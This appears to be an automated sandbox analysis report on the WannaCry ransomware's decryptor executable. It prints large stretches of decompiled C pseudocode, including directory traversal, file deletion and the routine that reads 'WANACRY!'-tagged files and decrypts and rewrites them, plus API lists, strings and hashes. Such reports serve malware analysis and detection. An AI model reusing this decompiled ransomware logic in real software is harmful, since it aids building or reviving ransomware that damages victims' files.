							_t139 = wcscmp(_t236 + 0x358, L"..");
							_t236 = _t236 + 8;
							if(_t139 != 0) {
								_push(_t236 + 0x358);
								swprintf(_t236 + 0x64, L"%s\\%s",  *(_t236 + 0x58c));
								_t236 = _t236 + 0x10;
								if((GetFileAttributesW(_t236 + 0x5c) & 0x00000010) == 0) {
									_t145 = wcscmp(_t236 + 0x358, L"@Please_Read_Me@.txt");
									_t236 = _t236 + 8;
									if(_t145 != 0) {
										_t146 = wcscmp(_t236 + 0x358, L"@WanaDecryptor@.exe.lnk");
										_t236 = _t236 + 8;
										if(_t146 != 0) {
											_t147 = wcscmp(_t236 + 0x358, L"@WanaDecryptor@.bmp");
											_t236 = _t236 + 8;
											if(_t147 != 0) {
												 *((char*)(_t236 + 0x4c)) =  *((intOrPtr*)(_t236 + 0x13));
												__imp__?_Tidy@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@AAEX_N@Z(0);
												_t149 = wcslen(_t236 + 0x5c);
												_t236 = _t236 + 4;
												__imp__?assign@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV12@PBGI@Z(_t236 + 0x5c, _t149);
												 *((char*)(_t236 + 0x590)) = 3;
												E00402DA0(_t236 + 0x48, _t236 + 0x20, _t236 + 0x38,  *(_t236 + 0x18), _t236 + 0x48);
												 *((char*)(_t236 + 0x584)) = 1;
												_push(1);
												goto L14;
											}
										}
									}
								} else {
									if(E00402AF0(_t143, _t236 + 0x5c, _t236 + 0x358) == 0) {
										 *((char*)(_t236 + 0x3c)) =  *((intOrPtr*)(_t236 + 0x13));
										__imp__?_Tidy@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@AAEX_N@Z(0);
										_t154 = wcslen(_t236 + 0x5c);
										_t236 = _t236 + 4;
										__imp__?assign@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV12@PBGI@Z(_t236 + 0x5c, _t154);
										 *((char*)(_t236 + 0x590)) = 2;
										E00402DA0(_t236 + 0x38, _t236 + 0x30, _t236 + 0x34,  *((intOrPtr*)(_t236 + 0x28)), _t236 + 0x38);
										 *((char*)(_t236 + 0x584)) = 1;
										_push(1);
										L14:
										__imp__?_Tidy@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@AAEX_N@Z();
									}
								}
							}
						}
						if(FindNextFileW( *(_t236 + 0x20), _t236 + 0x32c) != 0) {
							continue;
						}
						break;
					}
					FindClose( *(_t236 + 0x20));
					_t115 =  *(_t236 + 0x18);
					_t225 =  *_t115;
					if(_t225 != _t115) {
						while(1) {
							_t135 =  *((intOrPtr*)(_t232 + 0x4d0));
							if(_t135 != 0 &&  *_t135 != 0) {
								goto L22;
							}
							_t136 =  *((intOrPtr*)(_t225 + 0xc));
							if( *((intOrPtr*)(_t225 + 0xc)) == 0) {
								_t136 = __imp__?_C@?1??_Nullstr@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@CAPBGXZ@4GB;
							}
							E00402560(_t232, _t136);
							_t225 =  *_t225;
							if(_t225 !=  *(_t236 + 0x18)) {
								continue;
							}
							goto L22;
						}
					}
					L22:
					_t116 =  *((intOrPtr*)(_t236 + 0x28));
					_t226 =  *_t116;
					if(_t226 != _t116) {
						while(1) {
							_t131 =  *((intOrPtr*)(_t232 + 0x4d0));
							if(_t131 != 0 &&  *_t131 != 0) {
								goto L28;
							}
							_t132 =  *((intOrPtr*)(_t226 + 0xc));
							if( *((intOrPtr*)(_t226 + 0xc)) == 0) {
								_t132 = __imp__?_C@?1??_Nullstr@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@CAPBGXZ@4GB;
							}
							E004026B0(_t232, _t132);
							_t226 =  *_t226;
							if(_t226 !=  *((intOrPtr*)(_t236 + 0x28))) {
								continue;
							}
							goto L28;
						}
					}
					L28:
					_t227 =  *(_t236 + 0x58c);
					swprintf(_t236 + 0x64, L"%s\\%s", _t227);
					_t237 = _t236 + 0x10;
					DeleteFileW(_t237 + 0x5c);
					swprintf(_t237 + 0x64, L"%s\\%s", _t227, L"@WanaDecryptor@.exe.lnk", L"@Please_Read_Me@.txt");
					_t238 = _t237 + 0x10;
					DeleteFileW(_t238 + 0x5c);
					_t123 =  *((intOrPtr*)(_t238 + 0x18));
					 *((char*)(_t238 + 0x584)) = 0;
					_t221 = _t123;
					_t228 =  *_t123;
					if(_t228 != _t123) {
						do {
							_t129 = _t228;
							_t228 =  *_t228;
							E00402E90(_t238 + 0x1c, _t238 + 0x34, _t129);
						} while (_t228 != _t221);
						_t123 =  *((intOrPtr*)(_t238 + 0x18));
					}
					_push(_t123);
					L00412C98();
					_t229 =  *((intOrPtr*)(_t238 + 0x2c));
					 *((intOrPtr*)(_t238 + 0x1c)) = 0;
					 *((intOrPtr*)(_t238 + 0x20)) = 0;
					_t239 = _t238 + 4;
					_t124 =  *_t229;
					 *((intOrPtr*)(_t239 + 0x584)) = 0xffffffff;
					 *((intOrPtr*)(_t239 + 0x20)) = _t124;
					if(_t124 != _t229) {
						do {
							_push(0);
							E00402E90(_t239 + 0x2c, _t239 + 0x58,  *((intOrPtr*)(E00402D90(_t239 + 0x28, _t239 + 0x34))));
						} while ( *((intOrPtr*)(_t239 + 0x20)) != _t229);
					}
					_push( *((intOrPtr*)(_t239 + 0x28)));
					L00412C98();
					_t240 = _t239 + 4;
					_t125 = 1;
				} else {
					 *((char*)(_t236 + 0x57c)) = 0;
					E00402E00(_t236 + 0x18, _t236 + 0x2c,  *((intOrPtr*)( *((intOrPtr*)(_t236 + 0x10)))),  *((intOrPtr*)(_t236 + 0x10)));
					_push( *((intOrPtr*)(_t236 + 0x10)));
					L00412C98();
					_t242 = _t236 + 4;
					 *((intOrPtr*)(_t242 + 0x10)) = 0;
					 *((intOrPtr*)(_t242 + 0x14)) = 0;
					 *((intOrPtr*)(_t242 + 0x588)) = 0xffffffff;
					E00402E00(_t242 + 0x28, _t242 + 0x2c,  *((intOrPtr*)( *((intOrPtr*)(_t236 + 0x24)))),  *((intOrPtr*)(_t236 + 0x24)));
					_push( *((intOrPtr*)(_t242 + 0x20)));
					L00412C98();
					_t240 = _t242 + 4;
					_t125 = 0;
				}
				 *[fs:0x0] =  *((intOrPtr*)(_t240 + 0x574));
				return _t125;
			}




































                                                      0x004026b0
                                                      0x004026b2
                                                      0x004026bd
                                                      0x004026be
                                                      0x004026c5
                                                      0x004026d3
                                                      0x004026db
                                                      0x004026e4
                                                      0x004026e8
                                                      0x004026f1
                                                      0x004026fa
                                                      0x00402706
                                                      0x0040270a
                                                      0x00402720
                                                      0x00402728
                                                      0x0040272e
                                                      0x0040273e
                                                      0x00402747
                                                      0x0040274b
                                                      0x004027c2
                                                      0x004027c2
                                                      0x004027ca
                                                      0x00000000
                                                      0x00000000
                                                      0x004027e1
                                                      0x004027e3
                                                      0x004027e8
                                                      0x004027fb
                                                      0x004027fd
                                                      0x00402802
                                                      0x00402816
                                                      0x00402822
                                                      0x00402828
                                                      0x00402838
                                                      0x004028c3
                                                      0x004028c5
                                                      0x004028ca
                                                      0x004028dd
                                                      0x004028df
                                                      0x004028e4
                                                      0x004028f3
                                                      0x004028f5
                                                      0x004028fa
                                                      0x00402905
                                                      0x00402909
                                                      0x00402914
                                                      0x00402916
                                                      0x00402923
                                                      0x0040293c
                                                      0x00402944
                                                      0x00402949
                                                      0x00402951
                                                      0x00000000
                                                      0x00402953
                                                      0x004028fa
                                                      0x004028e4
                                                      0x0040283a
                                                      0x00402850
                                                      0x0040285f
                                                      0x00402863
                                                      0x0040286e
                                                      0x00402870
                                                      0x0040287d
                                                      0x00402896
                                                      0x0040289e
                                                      0x004028a3
                                                      0x004028ab
                                                      0x00402957
                                                      0x00402957
                                                      0x00402957
                                                      0x00402850
                                                      0x00402838
                                                      0x00402802
                                                      0x00402972
                                                      0x00000000
                                                      0x00000000
                                                      0x00000000
                                                      0x00402972
                                                      0x0040297d
                                                      0x00402983
                                                      0x00402987
                                                      0x0040298b
                                                      0x0040298d
                                                      0x0040298d
                                                      0x00402995
                                                      0x00000000
                                                      0x00000000
                                                      0x0040299b
                                                      0x004029a0
                                                      0x004029a2
                                                      0x004029a2
                                                      0x004029aa
                                                      0x004029af
                                                      0x004029b7
                                                      0x00000000
                                                      0x00000000
                                                      0x00000000
                                                      0x004029b7
                                                      0x0040298d
                                                      0x004029b9
                                                      0x004029b9
                                                      0x004029bd
                                                      0x004029c1
                                                      0x004029c3
                                                      0x004029c3
                                                      0x004029cb
                                                      0x00000000
                                                      0x00000000
                                                      0x004029d1
                                                      0x004029d6
                                                      0x004029d8
                                                      0x004029d8
                                                      0x004029e0
                                                      0x004029e5
                                                      0x004029ed
                                                      0x00000000
                                                      0x00000000
                                                      0x00000000
                                                      0x004029ed
                                                      0x004029c3
                                                      0x004029ef
                                                      0x004029ef
                                                      0x00402a0c
                                                      0x00402a0e
                                                      0x00402a16
                                                      0x00402a2c
                                                      0x00402a2e
                                                      0x00402a36
                                                      0x00402a3c
                                                      0x00402a40
                                                      0x00402a47
                                                      0x00402a49
                                                      0x00402a4d
                                                      0x00402a4f
                                                      0x00402a4f
                                                      0x00402a51
                                                      0x00402a5d
                                                      0x00402a62
                                                      0x00402a66
                                                      0x00402a66
                                                      0x00402a6a
                                                      0x00402a6b
                                                      0x00402a70
                                                      0x00402a74
                                                      0x00402a78
                                                      0x00402a7c
                                                      0x00402a7f
                                                      0x00402a81
                                                      0x00402a8e
                                                      0x00402a92
                                                      0x00402a94
                                                      0x00402a98
                                                      0x00402aaf
                                                      0x00402ab4
                                                      0x00402a94
                                                      0x00402abe
                                                      0x00402abf
                                                      0x00402ac4
                                                      0x00402ac7
                                                      0x0040274d
                                                      0x00402751
                                                      0x00402765
                                                      0x0040276e
                                                      0x0040276f
                                                      0x00402778
                                                      0x0040277b
                                                      0x0040277f
                                                      0x00402790
                                                      0x0040279b
                                                      0x004027a4
                                                      0x004027a5
                                                      0x004027aa
                                                      0x004027ad
                                                      0x004027ad
                                                      0x00402ad7
                                                      0x00402ae4

                                                      APIs
                                                        • Part of subcall function 0040C8F0: #823.MFC42(00000018,0040BB62,00000000,00000000), ref: 0040C8F2
                                                      • swprintf.MSVCRT ref: 00402728
                                                      • FindFirstFileW.KERNEL32(?,?,00000000), ref: 0040273E
                                                      • #825.MFC42(?,?,?,?), ref: 0040276F
                                                        • Part of subcall function 00402E00: #825.MFC42(?,?,00000000,?,?,0040276A,?,?,?), ref: 00402E44
                                                      • #825.MFC42(?), ref: 004027A5
                                                      • wcscmp.MSVCRT ref: 004027E1
                                                      • wcscmp.MSVCRT ref: 004027FB
                                                      • swprintf.MSVCRT(?,%s\%s,?,?), ref: 00402822
                                                      • GetFileAttributesW.KERNEL32(?), ref: 00402830
                                                      • ?_Tidy@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@AAEX_N@Z.MSVCP60(00000000,?,?), ref: 00402863
                                                      • wcslen.MSVCRT ref: 0040286E
                                                      • ?assign@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV12@PBGI@Z.MSVCP60(?,00000000), ref: 0040287D
                                                      • ?_Tidy@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@AAEX_N@Z.MSVCP60(00000001), ref: 00402957
                                                      • FindNextFileW.KERNEL32(?,?), ref: 0040296A
                                                      • FindClose.KERNEL32(?), ref: 0040297D
                                                        • Part of subcall function 00402E00: #825.MFC42(?,?,00000000,?,?,0040276A,?,?,?), ref: 00402E56
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 0000001C.00000002.4450384819.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 0000001C.00000002.4450341169.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 0000001C.00000002.4450550901.0000000000415000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 0000001C.00000002.4450641363.000000000041F000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 0000001C.00000002.4450693015.0000000000421000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 0000001C.00000002.4450741084.0000000000423000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_28_2_400000_@WanaDecryptor@.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: #825$FileFindG@2@@std@@G@std@@U?$char_traits@V?$allocator@$Tidy@?$basic_string@swprintfwcscmp$#823?assign@?$basic_string@AttributesCloseFirstNextV12@wcslen
                                                      • String ID: %s\%s$%s\*$@Please_Read_Me@.txt$@WanaDecryptor@.bmp$@WanaDecryptor@.exe.lnk
                                                      • API String ID: 1037557366-268640142
                                                      • Opcode ID: 32ebf1ff4900e8d1210108902f6386b15b456ebd42ad9138ad297bcaaa466a3d
                                                      • Instruction ID: 208863b35b678a93ee2eb357de9df0ae1c195017ff787e099a5ee1d1e2129eec
                                                      • Opcode Fuzzy Hash: 32ebf1ff4900e8d1210108902f6386b15b456ebd42ad9138ad297bcaaa466a3d
                                                      • Instruction Fuzzy Hash: 48C163B16083419FC720DF64CD84AEBB7E8ABD8304F44492EF595A3291E778E944CF66
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 004020A0 Relevance: 45.9, APIs: 25, Strings: 1, Instructions: 359filetimeCOMMON
                                                      Download Yara Rule
                                                      C-Code - Quality: 73%
                                                      			E004020A0(intOrPtr __ecx, WCHAR* _a4, WCHAR* _a8) {
				struct _OVERLAPPED* _v8;
				char _v20;
				long _v32;
				long _v36;
				union _LARGE_INTEGER* _v40;
				void _v44;
				char _v48;
				char _v560;
				struct _OVERLAPPED* _v564;
				union _LARGE_INTEGER* _v568;
				void _v572;
				char _v573;
				short _v575;
				intOrPtr _v579;
				void _v580;
				struct _FILETIME _v588;
				struct _FILETIME _v596;
				struct _FILETIME _v604;
				void* _v608;
				void _v612;
				void _v616;
				void* _v620;
				intOrPtr _v624;
				void* __ebx;
				void* __ebp;
				int _t109;
				int _t113;
				int _t115;
				int _t116;
				int _t118;
				void* _t119;
				signed int _t122;
				signed int _t137;
				signed int _t139;
				int _t140;
				signed int _t141;
				int _t145;
				signed int _t148;
				int _t152;
				int _t155;
				void* _t159;
				intOrPtr _t196;
				signed int _t212;
				signed int _t213;
				void* _t216;
				intOrPtr _t223;
				signed int _t224;
				void* _t226;
				intOrPtr _t227;

				_push(0xffffffff);
				_push(0x4158c8);
				_push(0x413050);
				_push( *[fs:0x0]);
				 *[fs:0x0] = _t227;
				_push(_t212);
				_v624 = __ecx;
				_t213 = _t212 | 0xffffffff;
				_v620 = _t213;
				_v608 = _t213;
				_v48 = 0;
				_v616 = 0;
				_v580 = 0;
				_v579 = 0;
				_v575 = 0;
				_v573 = 0;
				_v612 = 0;
				_v36 = 0;
				_v32 = 0;
				_v564 = 0;
				_v8 = 0;
				_t159 = CreateFileW(_a4, 0x80000000, 1, 0, 3, 0, 0);
				_v620 = _t159;
				if(_t159 != _t213) {
					GetFileTime(_t159,  &_v604,  &_v596,  &_v588);
					_t109 = ReadFile(_t159,  &_v580, 8,  &_v36, 0);
					__eflags = _t109;
					if(_t109 == 0) {
						L32:
						_push(0xffffffff);
						_push( &_v20);
						goto L33;
					} else {
						__eflags = 0;
						asm("repe cmpsd");
						if(0 != 0) {
							goto L32;
						} else {
							_t113 = ReadFile(_t159,  &_v616, 4,  &_v36, 0);
							__eflags = _t113;
							if(_t113 == 0) {
								goto L32;
							} else {
								__eflags = _v616 - 0x100;
								if(_v616 != 0x100) {
									goto L32;
								} else {
									_t223 = _v624;
									_t115 = ReadFile(_t159,  *(_t223 + 0x4c8), 0x100,  &_v36, 0);
									__eflags = _t115;
									if(_t115 == 0) {
										goto L32;
									} else {
										_t116 = ReadFile(_t159,  &_v612, 4,  &_v36, 0);
										__eflags = _t116;
										if(_t116 == 0) {
											goto L32;
										} else {
											_t118 = ReadFile(_t159,  &_v572, 8,  &_v36, 0);
											__eflags = _t118;
											if(_t118 == 0) {
												goto L32;
											} else {
												__eflags = _v612 - 3;
												if(_v612 != 3) {
													_t119 = CreateFileW(_a8, 0x40000000, 1, 0, 2, 0x80, 0);
													_t216 = _t119;
													_v608 = _t216;
													__eflags = _t216 - 0xffffffff;
													if(_t216 != 0xffffffff) {
														_push( &_v48);
														_push( &_v560);
														_t51 = _t223 + 4; // 0x4
														_t122 = E00404AF0(_t51,  *(_t223 + 0x4c8), _v616);
														__eflags = _t122;
														if(_t122 != 0) {
															L22:
															_t59 = _t223 + 0x54; // 0x54
															_push(0x10);
															_push(_v48);
															_t196 =  *0x4213b0; // 0x4218b0
															_push(_t196);
															_push( &_v560);
															E0040A150(_t59);
															_v44 = _v572;
															_v40 = _v568;
															while(1) {
																__eflags = _v40;
																if(__eflags < 0) {
																	break;
																}
																if(__eflags > 0) {
																	L26:
																	_t139 =  *(_t223 + 0x4d0);
																	__eflags = _t139;
																	if(_t139 == 0) {
																		L28:
																		_t140 = ReadFile(_t159,  *(_t223 + 0x4c8), 0x100000,  &_v36, 0);
																		__eflags = _t140;
																		if(_t140 == 0) {
																			L34:
																			_push(0xffffffff);
																			_push( &_v20);
																			goto L33;
																		} else {
																			_t141 = _v36;
																			__eflags = _t141;
																			if(_t141 == 0) {
																				goto L34;
																			} else {
																				_v44 = _v44 - _t141;
																				asm("sbb dword [ebp-0x24], 0x0");
																				_t76 = _t223 + 0x54; // 0x54
																				E0040B3C0(_t159, _t76, _t226,  *(_t223 + 0x4c8),  *(_t223 + 0x4cc), _t141, 1);
																				_t145 = WriteFile(_t216,  *(_t223 + 0x4cc), _v36,  &_v32, 0);
																				__eflags = _t145;
																				if(_t145 == 0) {
																					goto L32;
																				} else {
																					__eflags = _v32 - _v36;
																					if(_v32 == _v36) {
																						continue;
																					} else {
																						goto L32;
																					}
																				}
																			}
																		}
																	} else {
																		__eflags =  *_t139;
																		if( *_t139 != 0) {
																			goto L32;
																		} else {
																			goto L28;
																		}
																	}
																} else {
																	__eflags = _v44;
																	if(_v44 <= 0) {
																		break;
																	} else {
																		goto L26;
																	}
																}
																goto L41;
															}
															_push(0);
															SetFilePointerEx(_t216, _v572, _v568, 0);
															SetEndOfFile(_t216);
															goto L36;
														} else {
															_push( &_v48);
															_push( &_v560);
															_t56 = _t223 + 0x2c; // 0x2c
															_t148 = E00404AF0(_t56,  *(_t223 + 0x4c8), _v616);
															__eflags = _t148;
															if(_t148 != 0) {
																_v564 = 1;
																goto L22;
															} else {
																goto L20;
															}
														}
													} else {
														_push(_t119);
														_push( &_v20);
														goto L33;
													}
												} else {
													CloseHandle(_t159);
													_t159 = CreateFileW(_a4, 0xc0000000, 1, 0, 3, 0, 0);
													_v620 = _t159;
													__eflags = _t159 - 0xffffffff;
													if(_t159 == 0xffffffff) {
														goto L32;
													} else {
														SetFilePointer(_t159, 0xffff0000, 0, 2);
														_t152 = ReadFile(_t159,  *(_t223 + 0x4c8), 0x10000,  &_v36, 0);
														__eflags = _t152;
														if(_t152 == 0) {
															goto L32;
														} else {
															__eflags = _v36 - 0x10000;
															if(_v36 != 0x10000) {
																goto L32;
															} else {
																SetFilePointer(_t159, 0, 0, 0);
																_t155 = WriteFile(_t159,  *(_t223 + 0x4c8), 0x10000,  &_v32, 0);
																__eflags = _t155;
																if(_t155 == 0) {
																	L20:
																	_push(0xffffffff);
																	_push( &_v20);
																	goto L33;
																} else {
																	__eflags = _v32 - 0x10000;
																	if(_v32 != 0x10000) {
																		goto L20;
																	} else {
																		SetFilePointer(_t159, 0xffff0000, 0, 2);
																		SetEndOfFile(_t159);
																		_t216 = _v608;
																		L36:
																		SetFileTime(_t216,  &_v604,  &_v596,  &_v588);
																		__eflags = _v612 - 3;
																		if(_v612 == 3) {
																			_t137 = CloseHandle(_t159) | 0xffffffff;
																			__eflags = _t137;
																			_v608 = _t137;
																			_v620 = _t137;
																			MoveFileW(_a4, _a8);
																		}
																		_t224 =  *(_t223 + 0x4d4);
																		__eflags = _t224;
																		if(_t224 != 0) {
																			 *_t224(_a4, _a8, _v568, _v572, 0, _v564);
																		}
																		_push(0xffffffff);
																		_push( &_v20);
																		L00413056();
																		 *[fs:0x0] = _v20;
																		return 1;
																	}
																}
															}
														}
													}
												}
											}
										}
									}
								}
							}
						}
					}
				} else {
					_push(_t213);
					_push( &_v20);
					L33:
					L00413056();
					 *[fs:0x0] = _v20;
					return 0;
				}
				L41:
			}




















































                                                      0x004020a3
                                                      0x004020a5
                                                      0x004020aa
                                                      0x004020b5
                                                      0x004020b6
                                                      0x004020c5
                                                      0x004020c6
                                                      0x004020cc
                                                      0x004020cf
                                                      0x004020d5
                                                      0x004020dd
                                                      0x004020e0
                                                      0x004020e6
                                                      0x004020ef
                                                      0x004020f5
                                                      0x004020fc
                                                      0x00402102
                                                      0x00402108
                                                      0x0040210b
                                                      0x0040210e
                                                      0x00402114
                                                      0x0040212d
                                                      0x0040212f
                                                      0x00402137
                                                      0x00402159
                                                      0x0040216e
                                                      0x00402174
                                                      0x00402176
                                                      0x0040244c
                                                      0x0040244c
                                                      0x00402451
                                                      0x00000000
                                                      0x0040217c
                                                      0x0040218c
                                                      0x0040218e
                                                      0x00402190
                                                      0x00000000
                                                      0x00402196
                                                      0x004021a5
                                                      0x004021ab
                                                      0x004021ad
                                                      0x00000000
                                                      0x004021b3
                                                      0x004021b3
                                                      0x004021bd
                                                      0x00000000
                                                      0x004021c3
                                                      0x004021ce
                                                      0x004021dc
                                                      0x004021e2
                                                      0x004021e4
                                                      0x00000000
                                                      0x004021ea
                                                      0x004021fa
                                                      0x00402200
                                                      0x00402202
                                                      0x00000000
                                                      0x00402208
                                                      0x00402218
                                                      0x0040221e
                                                      0x00402220
                                                      0x00000000
                                                      0x00402226
                                                      0x00402226
                                                      0x0040222d
                                                      0x0040230f
                                                      0x00402315
                                                      0x00402317
                                                      0x0040231d
                                                      0x00402320
                                                      0x0040232f
                                                      0x00402336
                                                      0x00402345
                                                      0x00402348
                                                      0x0040234d
                                                      0x0040234f
                                                      0x0040238b
                                                      0x0040238b
                                                      0x0040238e
                                                      0x00402393
                                                      0x00402394
                                                      0x0040239a
                                                      0x004023a1
                                                      0x004023a2
                                                      0x004023ad
                                                      0x004023b6
                                                      0x004023b9
                                                      0x004023bc
                                                      0x004023be
                                                      0x00000000
                                                      0x00000000
                                                      0x004023c4
                                                      0x004023d1
                                                      0x004023d1
                                                      0x004023d7
                                                      0x004023d9
                                                      0x004023e0
                                                      0x004023f3
                                                      0x004023f9
                                                      0x004023fb
                                                      0x0040246f
                                                      0x0040246f
                                                      0x00402474
                                                      0x00000000
                                                      0x004023fd
                                                      0x004023fd
                                                      0x00402400
                                                      0x00402402
                                                      0x00000000
                                                      0x00402404
                                                      0x00402404
                                                      0x00402407
                                                      0x0040241c
                                                      0x0040241f
                                                      0x00402436
                                                      0x0040243c
                                                      0x0040243e
                                                      0x00000000
                                                      0x00402440
                                                      0x00402443
                                                      0x00402446
                                                      0x00000000
                                                      0x00000000
                                                      0x00000000
                                                      0x00000000
                                                      0x00402446
                                                      0x0040243e
                                                      0x00402402
                                                      0x004023db
                                                      0x004023db
                                                      0x004023de
                                                      0x00000000
                                                      0x00000000
                                                      0x00000000
                                                      0x00000000
                                                      0x004023de
                                                      0x004023c6
                                                      0x004023c9
                                                      0x004023cb
                                                      0x00000000
                                                      0x00000000
                                                      0x00000000
                                                      0x00000000
                                                      0x004023cb
                                                      0x00000000
                                                      0x004023c4
                                                      0x00402477
                                                      0x0040248a
                                                      0x00402491
                                                      0x00000000
                                                      0x00402351
                                                      0x00402354
                                                      0x0040235b
                                                      0x0040236a
                                                      0x0040236d
                                                      0x00402372
                                                      0x00402374
                                                      0x00402381
                                                      0x00000000
                                                      0x00000000
                                                      0x00000000
                                                      0x00000000
                                                      0x00402374
                                                      0x00402322
                                                      0x00402322
                                                      0x00402326
                                                      0x00000000
                                                      0x00402326
                                                      0x00402233
                                                      0x00402234
                                                      0x00402253
                                                      0x00402255
                                                      0x0040225b
                                                      0x0040225e
                                                      0x00000000
                                                      0x00402264
                                                      0x00402274
                                                      0x00402289
                                                      0x0040228f
                                                      0x00402291
                                                      0x00000000
                                                      0x00402297
                                                      0x00402297
                                                      0x0040229e
                                                      0x00000000
                                                      0x004022a4
                                                      0x004022ab
                                                      0x004022c0
                                                      0x004022c6
                                                      0x004022c8
                                                      0x00402376
                                                      0x00402376
                                                      0x0040237b
                                                      0x00000000
                                                      0x004022ce
                                                      0x004022ce
                                                      0x004022d5
                                                      0x00000000
                                                      0x004022db
                                                      0x004022e5
                                                      0x004022e8
                                                      0x004022ee
                                                      0x00402497
                                                      0x004024ad
                                                      0x004024b3
                                                      0x004024ba
                                                      0x004024c3
                                                      0x004024c3
                                                      0x004024c6
                                                      0x004024cc
                                                      0x004024da
                                                      0x004024da
                                                      0x004024e0
                                                      0x004024e6
                                                      0x004024e8
                                                      0x00402509
                                                      0x00402509
                                                      0x0040250b
                                                      0x00402510
                                                      0x00402511
                                                      0x00402521
                                                      0x0040252e
                                                      0x0040252e
                                                      0x004022d5
                                                      0x004022c8
                                                      0x0040229e
                                                      0x00402291
                                                      0x0040225e
                                                      0x0040222d
                                                      0x00402220
                                                      0x00402202
                                                      0x004021e4
                                                      0x004021bd
                                                      0x004021ad
                                                      0x00402190
                                                      0x00402139
                                                      0x00402139
                                                      0x0040213d
                                                      0x00402452
                                                      0x00402452
                                                      0x0040245f
                                                      0x0040246c
                                                      0x0040246c
                                                      0x00000000

                                                      APIs
                                                      • CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000), ref: 00402127
                                                      • GetFileTime.KERNEL32(00000000,?,?,?), ref: 00402159
                                                      • ReadFile.KERNEL32(00000000,00000000,00000008,?,00000000), ref: 0040216E
                                                      • ReadFile.KERNEL32(00000000,?,00000004,?,00000000), ref: 004021A5
                                                      • ReadFile.KERNEL32(00000000,?,00000100,?,00000000), ref: 004021DC
                                                      • ReadFile.KERNEL32(00000000,?,00000004,?,00000000), ref: 004021FA
                                                      • ReadFile.KERNEL32(00000000,?,00000008,?,00000000), ref: 00402218
                                                      • CloseHandle.KERNEL32(00000000), ref: 00402234
                                                      • CreateFileW.KERNEL32(?,C0000000,00000001,00000000,00000003,00000000,00000000), ref: 0040224D
                                                      • SetFilePointer.KERNEL32(00000000,FFFF0000,00000000,00000002), ref: 00402274
                                                      • ReadFile.KERNEL32(00000000,?,00010000,?,00000000), ref: 00402289
                                                      • _local_unwind2.MSVCRT ref: 00402452
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 0000001C.00000002.4450384819.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 0000001C.00000002.4450341169.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 0000001C.00000002.4450550901.0000000000415000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 0000001C.00000002.4450641363.000000000041F000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 0000001C.00000002.4450693015.0000000000421000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 0000001C.00000002.4450741084.0000000000423000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_28_2_400000_@WanaDecryptor@.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: File$Read$Create$CloseHandlePointerTime_local_unwind2
                                                      • String ID: WANACRY!
                                                      • API String ID: 1586634678-1240840912
                                                      • Opcode ID: 63e6b81c02b622754e2b3234a9462f2b9f42a26c1b415cc7ac48913855c751cb
                                                      • Instruction ID: 3da7a8628a1c4a9b72cf23ccbc301ae3d1bdd94b5a24a93ab77a4db798f2c342
                                                      • Opcode Fuzzy Hash: 63e6b81c02b622754e2b3234a9462f2b9f42a26c1b415cc7ac48913855c751cb
                                                      • Instruction Fuzzy Hash: 91D14471A00214AFDB20DB64CC89FEBB7B8FB88710F14466AF619B61D0D7B49945CF68
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 004035A0 Relevance: 36.2, APIs: 24, Instructions: 175windowclipboardmemoryCOMMON
                                                      Download Yara Rule
                                                      C-Code - Quality: 75%
                                                      			E004035A0(intOrPtr __ecx) {
				int _t51;
				void* _t54;
				long _t55;
				signed int _t64;
				signed int _t68;
				void* _t71;
				int _t78;
				short _t86;
				signed int _t92;
				intOrPtr _t110;
				int _t121;
				void* _t122;
				void* _t123;
				void* _t126;
				void* _t128;
				intOrPtr _t129;
				void* _t130;
				void* _t132;
				void* _t134;

				_push(0xffffffff);
				_push(E0041365C);
				_push( *[fs:0x0]);
				 *[fs:0x0] = _t129;
				_t130 = _t129 - 0x2e4;
				_t110 = __ecx;
				 *((intOrPtr*)(_t130 + 0x28)) = __ecx;
				_t51 = SendMessageA( *(__ecx + 0x80), 0x1004, 0, 0);
				if(_t51 != 0) {
					_t51 = OpenClipboard( *(_t110 + 0x20));
					if(_t51 != 0) {
						_t121 = 0;
						_t126 = 0;
						if(SendMessageA( *(_t110 + 0x80), 0x1004, 0, 0) > 0) {
							do {
								_push(0);
								_t71 = _t130 + 0x18;
								_push(_t121);
								_push(_t71);
								L00412D7C();
								_push(0x4206e0);
								_push(_t71);
								_push(_t130 + 0x14);
								 *(_t130 + 0x308) = 0;
								L00412CCE();
								 *(_t130 + 0x2fc) = 2;
								L00412CC2();
								 *(_t130 + 0x2fc) = 0xffffffff;
								_t126 = _t126 +  *( *(_t130 + 0x10) - 8) * 2;
